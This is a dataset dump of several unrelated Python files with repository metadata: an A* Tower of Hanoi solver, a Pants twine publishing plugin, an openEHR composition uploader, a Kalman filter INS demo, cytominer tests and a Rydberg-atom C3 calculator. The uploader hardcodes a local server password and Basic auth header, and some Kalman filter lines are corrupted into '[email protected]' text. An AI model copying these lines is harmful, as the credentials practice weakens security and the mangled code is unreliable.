self.recalcularParametros(copia_estado1)
lista_sucesoresB.append(copia_estado1)
copia_estado2.torreC.apilar(copia_estado2.torreB.cima())
copia_estado2.torreB.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresB.append(copia_estado2)
return lista_sucesoresB
if idTorre == "C":
lista_sucesoresC = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreB.apilar(copia_estado1.torreC.cima())
copia_estado1.torreC.desapilar()
self.recalcularParametros(copia_estado1)
lista_sucesoresC.append(copia_estado1)
copia_estado2.torreA.apilar(copia_estado2.torreC.cima())
copia_estado2.torreC.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresC.append(copia_estado2)
return lista_sucesoresC
def recalcularParametros(self, estado):
estado.padre = self
estado.nivel = estado.calcularNivelNodo()
estado.funcion_heuristica = estado.CalcularFuncionHeuristica()
def __eq__(self, other) -> bool:
if self.convertirEnLista(self.torreA) == self.convertirEnLista(other.torreA) and self.convertirEnLista(self.torreB) == self.convertirEnLista(other.torreB) and self.convertirEnLista(self.torreC) == self.convertirEnLista(other.torreC):
return True
return False
def __str__(self) -> str:
estado = ""
for disco in reversed(self.convertirEnLista(self.torreA)):
estado += str(disco) + " "
estado += "\n"
for disco in reversed(self.convertirEnLista(self.torreB)):
estado += str(disco) + " "
estado += "\n"
for disco in reversed(self.convertirEnLista(self.torreC)):
estado += str(disco) + " "
estado += "\n"
estado += "FH = " + str(self.funcion_heuristica)
return estado
def backtracking(self, list_solucion):
list_solucion.append(self)
if self.padre is not None:
return self.padre.backtracking(list_solucion)
else:
return 0
def inAbiertos(abiertos, estado):
flag = False
for abierto in abiertos:
if abierto.dato.__eq__(estado):
flag = True
break
return flag
if __name__ == "__main__":
abiertos = Colaprioridad()
cerrados = []
torreA = Pila()
torreA.apilar(4)
torreA.apilar(3)
torreA.apilar(2)
torreA.apilar(1)
torreB = Pila()
torreC = Pila()
torreAo = Pila()
torreBo = Pila()
torreCo = Pila()
torreCo.apilar(4)
torreCo.apilar(3)
torreCo.apilar(2)
torreCo.apilar(1)
estado_inicial = nodoGrafo(None, torreA, torreB, torreC)
estado_objetivo = nodoGrafo(None, torreAo, torreBo, torreCo)
abiertos.encolar(estado_inicial, estado_inicial.funcion_heuristica)
estado_actual = estado_inicial
iteraciones = 0
while not (estado_actual.__eq__(estado_objetivo)) and len(abiertos) > 0:
estado_actual = abiertos.desencolar().dato
# print(estado_actual)
# print("=======================")
sucesores = estado_actual.generarEstadosSucesores()
for estado in sucesores:
if not inAbiertos(abiertos, estado) and estado not in cerrados:
abiertos.encolar(estado, estado.funcion_heuristica)
cerrados.append(estado_actual)
iteraciones += 1
if estado_actual.__eq__(estado_objetivo):
print("Exito")
print("Nivel : " + str(estado_actual.nivel))
print("Iteraciones : " + str(iteraciones))
list_solucion = []
estado_actual.backtracking(list_solucion)
for solucion in reversed(list_solucion):
print("=======================")
print(solucion)
else:
print("No se pudo encontrar una solucion")
|
difer19/Estructuras-de-Datos
|
GrafosA_Star.py
|
GrafosA_Star.py
|
py
| 7,942 |
python
|
es
|
code
| 0 |
github-code
|
6
|
26040958016
|
from __future__ import annotations
import logging
from dataclasses import dataclass
from pants.backend.python.subsystems.twine import TwineSubsystem
from pants.backend.python.target_types import PythonDistribution
from pants.backend.python.util_rules.pex import PexRequest, VenvPex, VenvPexProcess
from pants.core.goals.publish import (
PublishFieldSet,
PublishOutputData,
PublishPackages,
PublishProcesses,
PublishRequest,
)
from pants.core.util_rules.config_files import ConfigFiles, ConfigFilesRequest
from pants.engine.env_vars import EnvironmentVars, EnvironmentVarsRequest
from pants.engine.fs import CreateDigest, Digest, MergeDigests, Snapshot
from pants.engine.process import InteractiveProcess, Process
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import BoolField, StringSequenceField
from pants.option.global_options import GlobalOptions
from pants.util.strutil import help_text
logger = logging.getLogger(__name__)
class PythonRepositoriesField(StringSequenceField):
alias = "repositories"
help = help_text(
"""
List of URL addresses or Twine repository aliases where to publish the Python package.
Twine is used for publishing Python packages, so the address to any kind of repository
that Twine supports may be used here.
Aliases are prefixed with `@` to refer to a config section in your Twine configuration,
such as a `.pypirc` file. Use `@pypi` to upload to the public PyPi repository, which is
the default when using Twine directly.
"""
)
# Twine uploads to 'pypi' by default, but we don't set default to ["@pypi"] here to make it
# explicit in the BUILD file when a package is meant for public distribution.
class SkipTwineUploadField(BoolField):
alias = "skip_twine"
default = False
help = "If true, don't publish this target's packages using Twine."
class PublishPythonPackageRequest(PublishRequest):
pass
@dataclass(frozen=True)
class PublishPythonPackageFieldSet(PublishFieldSet):
publish_request_type = PublishPythonPackageRequest
required_fields = (PythonRepositoriesField,)
repositories: PythonRepositoriesField
skip_twine: SkipTwineUploadField
def get_output_data(self) -> PublishOutputData:
return PublishOutputData(
{
"publisher": "twine",
**super().get_output_data(),
}
)
# I'd rather opt out early here, so we don't build unnecessarily, however the error feedback is
# misleading and not very helpful in that case.
#
# @classmethod
# def opt_out(cls, tgt: Target) -> bool:
# return not tgt[PythonRepositoriesField].value
def twine_upload_args(
twine_subsystem: TwineSubsystem,
config_files: ConfigFiles,
repo: str,
dists: tuple[str, ...],
ca_cert: Snapshot | None,
) -> tuple[str, ...]:
args = ["upload", "--non-interactive"]
if ca_cert and ca_cert.files:
args.append(f"--cert={ca_cert.files[0]}")
if config_files.snapshot.files:
args.append(f"--config-file={config_files.snapshot.files[0]}")
args.extend(twine_subsystem.args)
if repo.startswith("@"):
# Named repository from the config file.
args.append(f"--repository={repo[1:]}")
else:
args.append(f"--repository-url={repo}")
args.extend(dists)
return tuple(args)
def twine_env_suffix(repo: str) -> str:
return f"_{repo[1:]}".replace("-", "_").upper() if repo.startswith("@") else ""
def twine_env_request(repo: str) -> EnvironmentVarsRequest:
suffix = twine_env_suffix(repo)
env_vars = [
"TWINE_USERNAME",
"TWINE_PASSWORD",
"TWINE_REPOSITORY_URL",
]
req = EnvironmentVarsRequest(env_vars + [f"{var}{suffix}" for var in env_vars])
return req
def twine_env(env: EnvironmentVars, repo: str) -> EnvironmentVars:
suffix = twine_env_suffix(repo)
return EnvironmentVars(
{key.rsplit(suffix, maxsplit=1)[0] if suffix else key: value for key, value in env.items()}
)
@rule
async def twine_upload(
request: PublishPythonPackageRequest,
twine_subsystem: TwineSubsystem,
global_options: GlobalOptions,
) -> PublishProcesses:
dists = tuple(
artifact.relpath
for pkg in request.packages
for artifact in pkg.artifacts
if artifact.relpath
)
if twine_subsystem.skip or not dists:
return PublishProcesses()
# Too verbose to provide feedback as to why some packages were skipped?
skip = None
if request.field_set.skip_twine.value:
skip = f"(by `{request.field_set.skip_twine.alias}` on {request.field_set.address})"
elif not request.field_set.repositories.value:
# I'd rather have used the opt_out mechanism on the field set, but that gives no hint as to
# why the target was not applicable..
skip = f"(no `{request.field_set.repositories.alias}` specified for {request.field_set.address})"
if skip:
return PublishProcesses(
[
PublishPackages(
names=dists,
description=skip,
),
]
)
twine_pex, packages_digest, config_files = await MultiGet(
Get(VenvPex, PexRequest, twine_subsystem.to_pex_request()),
Get(Digest, MergeDigests(pkg.digest for pkg in request.packages)),
Get(ConfigFiles, ConfigFilesRequest, twine_subsystem.config_request()),
)
ca_cert_request = twine_subsystem.ca_certs_digest_request(global_options.ca_certs_path)
ca_cert = await Get(Snapshot, CreateDigest, ca_cert_request) if ca_cert_request else None
ca_cert_digest = (ca_cert.digest,) if ca_cert else ()
input_digest = await Get(
Digest, MergeDigests((packages_digest, config_files.snapshot.digest, *ca_cert_digest))
)
pex_proc_requests = []
twine_envs = await MultiGet(
Get(EnvironmentVars, EnvironmentVarsRequest, twine_env_request(repo))
for repo in request.field_set.repositories.value
)
for repo, env in zip(request.field_set.repositories.value, twine_envs):
pex_proc_requests.append(
VenvPexProcess(
twine_pex,
argv=twine_upload_args(twine_subsystem, config_files, repo, dists, ca_cert),
input_digest=input_digest,
extra_env=twine_env(env, repo),
description=repo,
)
)
processes = await MultiGet(
Get(Process, VenvPexProcess, request) for request in pex_proc_requests
)
return PublishProcesses(
PublishPackages(
names=dists,
process=InteractiveProcess.from_process(process),
description=process.description,
data=PublishOutputData({"repository": process.description}),
)
for process in processes
)
def rules():
return (
*collect_rules(),
*PublishPythonPackageFieldSet.rules(),
PythonDistribution.register_plugin_field(PythonRepositoriesField),
PythonDistribution.register_plugin_field(SkipTwineUploadField),
)
|
pantsbuild/pants
|
src/python/pants/backend/python/goals/publish.py
|
publish.py
|
py
| 7,218 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
24957977468
|
#!/usr/bin/python3
'''Post the compositions in a given directory filtered or not by a basename
now one ehr per composition
'''
import json
import logging
import requests
from url_normalize import url_normalize
import sys
import argparse
import os
from typing import Any,Callable
import re
from json_tools import diff
import collections
import uuid
def compare(firstjson:json,secondjson:json)->None:
'''
compare the given jsons
'''
one=flatten(firstjson)
two=flatten(secondjson)
return json.dumps((diff(one,two)),indent=4)
def change_naming(myjson:json)->json:
'''change naming convention on the json'''
return change_dict_naming_convention(myjson,convertcase)
def flatten(d:dict, parent_key:str='', sep:str='_')->dict:
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def change_dict_naming_convention(d:Any, convert_function:Callable[[str],str])->dict:
"""
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
convert_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
"""
if not isinstance(d,dict):
return d
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = change_dict_naming_convention(v, convert_function)
elif isinstance(v, list):
new_v = list()
for x in v:
new_v.append(change_dict_naming_convention(x, convert_function))
new[convert_function(k)] = new_v
return new
def convertcase(name:str)->str:
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def analyze_comparison(comparison_results:list)->int:
ndifferences=0
for l in comparison_results:
if "add" in l:
if("_uid" in l['add']): #ignore if it is _uid
continue
else:
ndifferences+=1
logging.debug(f"difference add:{l['add']} value={l['value']}")
elif "remove" in l:
ndifferences+=1
logging.debug(f"difference remove:{l['remove']} value={l['value']}")
elif "replace" in l:
if(l['replace'].endswith("time")):
if(l['value'][:18]==l['prev'][:18]):
continue
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
elif(l['value'].startswith('P') and l['value'].endswith('D')):
continue
else:
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
return ndifferences
def create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid):
logging.debug('----POST EHR----')
body1='''
{
"_type" : "EHR_STATUS",
"name" : {
"_type" : "DV_TEXT",
"value" : "EHR Status"
},
"subject" : {
"_type" : "PARTY_SELF",
"external_ref" : {
"_type" : "PARTY_REF",
"namespace" : "BBMRI",
"type" : "PERSON",
"id" : {
"_type" : "GENERIC_ID",
'''
body2=f' "value" : "{patientid}",'
body3='''
"scheme" : "BBMRI"
}
}
},
"archetype_node_id" : "openEHR-EHR-EHR_STATUS.generic.v1",
"is_modifiable" : true,
"is_queryable" : true
}
'''
body=body1+body2+body3
logging.debug(f'body={body}')
# sys.exit(0)
ehrs = client.post(EHR_SERVER_BASE_URL + 'ehr', \
params={},headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json','Prefer': 'return={representation|minimal}'},\
data=body)
print(f'create ehr status_code={ehrs.status_code}')
logging.info(f'create ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehrs.headers={ehrs.headers}')
logging.debug(f'ehrs.text={ehrs.text}')
logging.debug(f'ehrs.json={ehrs.json}')
if(ehrs.status_code==409 and 'Specified party has already an EHR set' in json.loads(ehrs.text)['message']):
#get ehr summary by subject_id , subject_namespace
payload = {'subject_id':patientid,'subject_namespace':'BBMRI'}
ehrs = client.get(EHR_SERVER_BASE_URL + 'ehr', params=payload,headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json'})
print('ehr already existent')
logging.info('ehr already existent')
logging.debug('----GET EHR----')
print(f'get ehr: status_code={ehrs.status_code}')
logging.info(f'get ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehr.headers={ehrs.headers}')
logging.debug(f'ehr.text={ehrs.text}')
logging.debug(f'ehr.json={ehrs.json}')
ehrid=json.loads(ehrs.text)["ehr_id"]["value"]
print(f'Patient {patientid}: retrieved ehrid={ehrid}')
logging.info(f'Patient {patientid}: retrieved ehrid={ehrid}')
return ehrid
# print(f'ehrheaders={ehrs.headers}')
urlehrstring = ehrs.headers['Location']
ehridstring = "{"+urlehrstring.split("v1/ehr/",2)[2]
ehrid=uuid.UUID(ehridstring)
print(f'Patient {patientid}: ehrid={str(ehrid)}')
logging.info(f'Patient {patientid}: ehrid={str(ehrid)}')
return ehrid
def main():
print('COMPOSITIONS UPLOADER')
parser = argparse.ArgumentParser()
parser.add_argument('--loglevel',help='the logging level:DEBUG,INFO,WARNING,ERROR or CRITICAL',default='WARNING')
parser.add_argument('--inputdir',help='dir containing the compositions',default='RESULTS')
parser.add_argument('--basename',help='basename to filter compositions')
parser.add_argument('--templatename',help='template to use when posting',default='crc_cohort')
parser.add_argument('--check',action='store_true', help='check the missing leafs for leafs that should be there but are not')
args=parser.parse_args()
loglevel=getattr(logging, args.loglevel.upper(),logging.WARNING)
if not isinstance(loglevel, int):
raise ValueError('Invalid log level: %s' % loglevel)
logging.basicConfig(filename='./CompositionUploader.log',filemode='w',level=loglevel)
inputdir=args.inputdir
print(f'inputdir given: {inputdir}')
logging.info(f'inputdir given: {inputdir}')
if not os.path.exists(inputdir):
print(f'directory {inputdir} does not exist')
logging.error(f'directory {inputdir} does not exist')
sys.exit(1)
basename=args.basename
if(basename):
logging.info(f'basename given: {basename}')
print(f'basename given: {basename}')
check=False
if args.check:
check=True
print ('Check is set to true')
logging.info('Check is set to true')
#get the list of files
filelist=[]
if basename:
for file in os.listdir(inputdir):
if file.startswith(basename) and file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
else:
for file in os.listdir(inputdir):
if file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
# Now sort the list
filelist.sort(key=lambda a: int(a.split('_')[1]))
for i,f in enumerate(filelist):
logging.info(f'file {i+1} = {f}')
# Initialize the connection to ehrbase
EHR_SERVER_BASE_URL = 'http://localhost:8080/ehrbase/rest/openehr/v1/'
EHR_SERVER_BASE_URL_FLAT = 'http://localhost:8080/ehrbase/rest/ecis/v1/composition/'
client = requests.Session()
client.auth = ('ehrbase-user','SuperSecretPassword')
auth="Basic ZWhyYmFzZS11c2VyOlN1cGVyU2VjcmV0UGFzc3dvcmQ="
nfiles=len(filelist)
print(f'{nfiles} to insert')
logging.info(f'{nfiles} to insert')
#check if the template is already in the db
templatename=args.templatename
myurl=url_normalize(EHR_SERVER_BASE_URL + 'definition/template/adl1.4')
response = client.get(myurl,params={'format': 'JSON'},headers={'Authorization':auth,'Content-Type':'application/JSON'})
templates=[a["template_id"] for a in json.loads(response.text)]
if(templatename not in templates):
print(f'Missing template {templatename}')
logging.error(f'Missing template {templatename}')
sys.exit(1)
# loop over files and upload the compositions
myurl=url_normalize(EHR_SERVER_BASE_URL_FLAT)
compinserted=0
compok=0
for i,file in enumerate(filelist):
print(f'********FILE {i+1}/{nfiles} {file}********')
logging.info(f'********FILE {i+1}/{nfiles} {file}********')
filename=os.path.join(inputdir, file)
with open(filename) as json_file:
compositionjson = json.load(json_file)
patientid='Patient'+compositionjson[templatename.lower()+'/context/case_identification/patient_pseudonym']
print(f'Patientid={patientid}')
logging.info(f'Patientid={patientid}')
# create ehr
ehrid=create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid)
# post composition
compositionjson=json.dumps(compositionjson)
response = client.post(myurl,
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json','Prefer':'return=representation'}, \
data=compositionjson \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't post the composition. Error={response.status_code}")
print(f'response.text {response.text}')
logging.info(f"Couldn't post the composition. Error={response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
compinserted+=1
print(f'Composition inserted')
compositionUid=json.loads(response.text)["compositionUid"]
print(f'compositionUid={compositionUid}')
logging.info(f'compositionUid={compositionUid}')
if(check):
print(f'checking...')
logging.info(f'checking...')
#get composition created and compare with the one posted
myurlu=url_normalize(EHR_SERVER_BASE_URL_FLAT+compositionUid)
response = client.get(myurlu, \
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json'}, \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
origjson=json.loads(compositionjson)
retrievedjson=json.loads(response.text)["composition"]
origchanged=change_naming(origjson)
retrchanged=change_naming(retrievedjson)
comparison_results=compare(origchanged,retrchanged)
ndiff=analyze_comparison(comparison_results)
if(ndiff>0):
print('original and retrieved json differ')
logging.info('original and retrieved json differ')
logging.debug(f'comparison_results:')
logging.debug(comparison_results)
else:
print('original and retrieved json do not differ')
logging.info('original and retrieved json do not differ')
compok+=1
print(f'{compinserted}/{nfiles} compositions inserted successfully')
logging.info(f'{compinserted}/{nfiles} compositions inserted successfully')
print(f'{nfiles-compinserted}/{nfiles} compositions with errors')
if(check):
print(f'{compok}/{compinserted} checked successfully')
logging.info(f'{compok}/{compinserted} checked successfully')
print(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
logging.info(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
if __name__ == '__main__':
main()
|
crs4/TO_OPENEHR_CONVERTER
|
COMPOSITIONS_UPLOADER/CompositionUploader.py
|
CompositionUploader.py
|
py
| 11,566 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23213929420
|
"""
IMU 6-DOF
Acceleration
- imu_accel_x
- imu_accel_y
- imu_accel_z
Angular speed
- imu_gyro_x
- imu_gyro_y
- imu_gyro_z
"""
import numpy as np
from numpy.linalg import inv
from scipy.spatial.transform import Rotation as rot
"""
X: states:
- pitch
- roll
- yaw (not used)
- bias angular rate pitch
- bias angular rate roll
- bias angular rate yaw
Note: In order to compute yaw, an additional sensor like a magnetometer is required.
u: inputs
- Euler angles
"""
class INS_filter:
def __init__(self, data):
dt = 1e-2
self.X = np.zeros([6,1]) # error in Euler angles, gyro biases
self.X[0] = -np.arctan2(data["imu_accel_y"], np.sqrt(data["imu_accel_y"]**2+data["imu_accel_z"]**2))
self.X[1] = np.arctan2(data["imu_accel_x"], np.sqrt(data["imu_accel_x"]**2+data["imu_accel_z"]**2))
self.Cnb = rot.from_euler("xyz", self.X[0:3].transpose()).as_matrix()[0]
self.P = np.identity(6)
# Process model
self.F = np.identity(6)
self.F[0:3,3:6] = -dt*self.Cnb
# Control action model
self.B = np.zeros([6,3])
self.B[0:3, 0:3] = np.identity(3)*dt
# Observation matrix
self.H = np.zeros([3,6])
self.H[0:3, 0:3] = np.identity(3)
# Process noise matrix
self.gyro_psd = 3.5e-4
self.gyro_bias_psd = 1e-7
self.Q = np.zeros([6,6])
self.updateQ(dt)
# Sensor noise matrix (accel)
self.R = np.zeros([3,3])
self.R[0][0] = 5
self.R[1][1] = 5
self.R[2][2] = 5
def updateQ(self, dt):
self.Q[0:3, 0:3] = np.identity(3)*self.gyro_psd*dt
self.Q[3:6, 3:6] = np.identity(3) * self.gyro_bias_psd * dt
def predict(self, w, dt): # w is the angular rate vector
self.Cnb = rot.from_euler("xyz", self.X[0:3].transpose()).as_matrix()[0]
u = w.transpose()
self.updateQ(dt)
#update dt
self.F[0:3,3:6] = -dt*self.Cnb
self.B[0:3, 0:3] = dt*self.Cnb
# build pseudo control var u
self.X = [email protected] + self.B@u
self.P = [email protected]@self.F.transpose() + self.Q
def updateAttitude(self, a_bib):
z = self.getEulerAnglesFromAccel(a_bib.transpose())
y = z - [email protected]
S = [email protected]@self.H.transpose() + self.R
K = ([email protected]())@inv(S)
self.X = self.X+K@y
I = np.identity(6)
self.P = ([email protected])@self.P
def getEulerAnglesFromAccel(self, a_bib):
eul_nb = np.zeros([3,1])
eul_nb[0] = -np.arctan2(a_bib[1], np.sqrt(a_bib[1]**2+a_bib[2]**2))
eul_nb[1] = np.arctan2(a_bib[0], np.sqrt(a_bib[0]**2+a_bib[2]**2))
return eul_nb
def get_states(self):
return {"roll": np.asscalar(self.X[0])*180/np.pi,
"pitch": np.asscalar(self.X[1])*180/np.pi,
"yaw": np.asscalar(self.X[2])*180/np.pi,
"gyro_bias_roll": np.asscalar(self.X[3])*180/np.pi,
"gyro_bias_pitch": np.asscalar(self.X[4])*180/np.pi}
def run_filter_simulation(df):
import time
start = time.time()
init = False
kf_ins_res = {"roll": [], "pitch":[], "yaw":[], "gyro_bias_roll":[], "gyro_bias_pitch":[]}
last_time = 0
for index, row in df.iterrows():
if not init:
ins_kf = INS_filter(row)
init = True
last_time = row["time"] - 1e-2
# Note: in a real-time system, the prediction step should run at each iteration
# This hack is only used here for simulation purposes
if row["imu_new_data"]:
dt = row["time"] - last_time
ins_kf.predict(np.matrix([row["imu_gyro_x"], row["imu_gyro_y"], row["imu_gyro_z"]]), dt)
last_time = row["time"]
if row["imu_new_data"]:
ins_kf.updateAttitude(np.matrix([row["imu_accel_x"], row["imu_accel_y"], row["imu_accel_z"]]))
res = ins_kf.get_states()
kf_ins_res["roll"].append(res["roll"])
kf_ins_res["pitch"].append(res["pitch"])
kf_ins_res["yaw"].append(res["yaw"])
kf_ins_res["gyro_bias_roll"].append(res["gyro_bias_roll"])
kf_ins_res["gyro_bias_pitch"].append(res["gyro_bias_pitch"])
end = time.time()
print(f"Execution time: {end - start} s")
import matplotlib.pyplot as plt
f, ax = plt.subplots(4, 1)
ax[0].set_title("Roll")
ax[0].plot(df["time"], kf_ins_res["roll"], label="roll")
ax[1].set_title("Pitch")
ax[1].plot(df["time"], kf_ins_res["pitch"], label="pitch")
ax[2].set_title("Gyro bias roll")
ax[2].plot(df["time"], kf_ins_res["gyro_bias_roll"], label="gyro_bias_roll")
ax[3].set_title("Gyro bias pitch")
ax[3].plot(df["time"], kf_ins_res["gyro_bias_pitch"], label="gyro_bias_pitch")
plt.subplots_adjust(hspace=0.4)
f.canvas.set_window_title('Kalman Filter INS')
f.suptitle("Kalman Filter INS")
# f.legend()
plt.show()
if __name__ == "__main__":
import pandas as pd
data = pd.read_csv("gns_ins_data2.csv")
run_filter_simulation(data)
|
toshiharutf/Kalman_Filter_GNS_INS
|
ins_filter_full_state_demo.py
|
ins_filter_full_state_demo.py
|
py
| 5,133 |
python
|
en
|
code
| 6 |
github-code
|
6
|
28800553771
|
import os
import pytest
import pathlib
import numpy as np
import pandas as pd
from math import isclose
from cytominer_eval.operations import mp_value
from cytominer_eval.utils.mpvalue_utils import (
calculate_mp_value,
calculate_mahalanobis,
)
# Load CRISPR dataset
example_file = "SQ00014610_normalized_feature_select.csv.gz"
example_file = pathlib.Path(
"{file}/../../example_data/gene/{eg}".format(
file=os.path.dirname(__file__), eg=example_file
)
)
df = pd.read_csv(example_file)
meta_features = [
x for x in df.columns if (x.startswith("Metadata_") or x.startswith("Image_"))
]
features = df.drop(meta_features, axis="columns").columns.tolist()
control_perts = ["Luc-2", "LacZ-2", "LacZ-3"]
replicate_id = "Metadata_pert_name"
def test_calculate_mahalanobis():
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
maha = calculate_mahalanobis(pert_df=sub_df, control_df=control_df)
assert isinstance(maha, float)
# The following value is empirically determined
# and not theoretically justified but avoids unwanted
# changes in the implementation of the Mahalanobis distance
assert isclose(maha, 3.62523778789, abs_tol=1e-09)
maha = calculate_mahalanobis(pert_df=control_df, control_df=control_df)
# Distance to itself should be approximately zero
assert isclose(maha, 0, abs_tol=1e-05)
def test_calculate_mp_value():
# The mp-values are empirical p-values
# so they range from 0 to 1, with low values
# showing a difference to the control condition.
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
# Avoid fluctuations in permutations
np.random.seed(2020)
result = calculate_mp_value(pert_df=sub_df, control_df=control_df)
assert isinstance(result, float)
assert result > 0
assert result < 1
# Distance to itself should be approximately zero
# So mp-value should be 1
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"nb_permutations": 2000}
)
assert isclose(result, 1, abs_tol=1e-02)
with pytest.raises(AssertionError) as ae:
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"not_a_parameter": 2000}
)
assert "Unknown parameters provided. Only" in str(ae.value)
def test_mp_value():
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
)
assert "mp_value" in result.columns
assert all(result.mp_value <= 1)
assert all(result.mp_value >= 0)
assert len(np.unique(df[replicate_id])) == len(result)
with pytest.raises(AssertionError) as ae:
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
params={"not_a_parameter": 2000},
)
assert "Unknown parameters provided. Only" in str(ae.value)
|
cytomining/cytominer-eval
|
cytominer_eval/tests/test_operations/test_mp_value.py
|
test_mp_value.py
|
py
| 3,230 |
python
|
en
|
code
| 7 |
github-code
|
6
|
34218646786
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 6 12:31:40 2023
@author: tillappel
"""
from arc import *
from IPython.display import display, HTML
import numpy as np
import scipy.constants as sc
import matplotlib.pyplot as plt
def find_largest_c3(n,n_2, l0, j0):
largest_c3_d0 = 0
largest_c3_d1 = 0
largest_i_d0 = 0
largest_i_d1 = 0
largest_j_d0 = 0
largest_j_d1 = 0
largest_transition_d0 = ""
largest_transition_d1 = ""
atom = Rubidium()
# Iterate over combinations of i and j
for i in range(1, 4):
for j in range(1, 4):
# Calculate the dipole matrix element for pi/pi transition with d=0
dsDME_pi_d0 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0), 0)
dpDME_pi_d0 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0, j0, 0)
c3_pi_d0 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_pi_d0
* dpDME_pi_d0
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Calculate the dipole matrix element for sigma+/sigma- transition with d=0
dsDME_sigma_d0 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0), -1)
dpDME_sigma_d0 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0, j0, 1)
c3_sigma_d0 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_sigma_d0
* dpDME_sigma_d0
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Compare the calculated c3 coefficients with d=0 and update the largest values
if abs(c3_pi_d0) > abs(largest_c3_d0):
largest_c3_d0 = c3_pi_d0
largest_i_d0 = i
largest_j_d0 = j
largest_transition_d0 = "pi/pi"
if abs(c3_sigma_d0) > abs(largest_c3_d0):
largest_c3_d0 = c3_sigma_d0
largest_i_d0 = i
largest_j_d0 = j
largest_transition_d0 = "sigma+/sigma-"
# Calculate the dipole matrix element for pi/pi transition with d=1
dsDME_pi_d1 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0-1), 0)
dpDME_pi_d1 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0+1, j0+1, 0)
c3_pi_d1 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_pi_d1
* dpDME_pi_d1
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Calculate the dipole matrix element for sigma+/sigma- transition with d=1
dsDME_sigma_d1 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(-1+j0), np.abs(-1+j0), -1)
dpDME_sigma_d1 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, 1+j0, 1+j0, 1)
c3_sigma_d1 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_sigma_d1
* dpDME_sigma_d1
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Compare the calculated c3 coefficients with d=1 and update the largest values
if abs(c3_pi_d1) > abs(largest_c3_d1):
largest_c3_d1 = c3_pi_d1
largest_i_d1 = i
largest_j_d1 = j
largest_transition_d1 = "pi/pi"
if abs(c3_sigma_d1) > abs(largest_c3_d1):
largest_c3_d1 = c3_sigma_d1
largest_i_d1 = i
largest_j_d1 = j
largest_transition_d1 = "sigma+/sigma-"
return (
largest_i_d0, largest_j_d0, largest_transition_d0, abs(largest_c3_d0) / C_h * 1.0e9,
largest_i_d1, largest_j_d1, largest_transition_d1, abs(largest_c3_d1) / C_h * 1.0e9
)
# Specify the value of n, l0, and j0
n = 59
n_2 = 59
l = 0
j = 0.5
